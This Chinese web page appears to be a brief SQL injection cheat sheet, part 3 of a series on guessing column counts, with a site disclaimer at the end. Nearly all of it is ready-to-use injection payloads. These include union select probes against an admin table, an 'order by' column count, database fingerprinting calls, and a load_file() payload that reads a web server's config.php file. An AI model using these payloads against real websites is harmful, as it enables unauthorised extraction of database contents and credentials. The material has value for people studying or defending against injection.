联合查询
and 1=2 union select 1,2,3,4,5,6 from admin –a
access类型:
and exists(selct * from sys_admin)
判断字段数
order by 50
常见数据函数
MSSQL:
查询数据库版本
@@version
mysql:
打开绝对路径文件
union select 1,load_file(‘D:/www/html/config.php’),3,4,5,6
数据库版本
version()
数据库名
database()
用户名
user()
系统版本
@@version_compile_os
温馨提示:
文章标题:sql注入-3.猜字段
文章链接:https://jssnd.com.cn/3639.html
更新时间:2024年12月11日
本站大部分内容均收集于网络!若内容若侵犯到您的权益,请发送邮件至:3607845@qq.com我们将第一时间处理!
资源所需价格并非资源售卖价格,是收集、整理、编辑详情以及本站运营的适当补贴,并且本站不提供任何免费技术支持。
所有资源仅限于参考和学习,版权归原作者所有,更多请阅读SND网络服务协议。
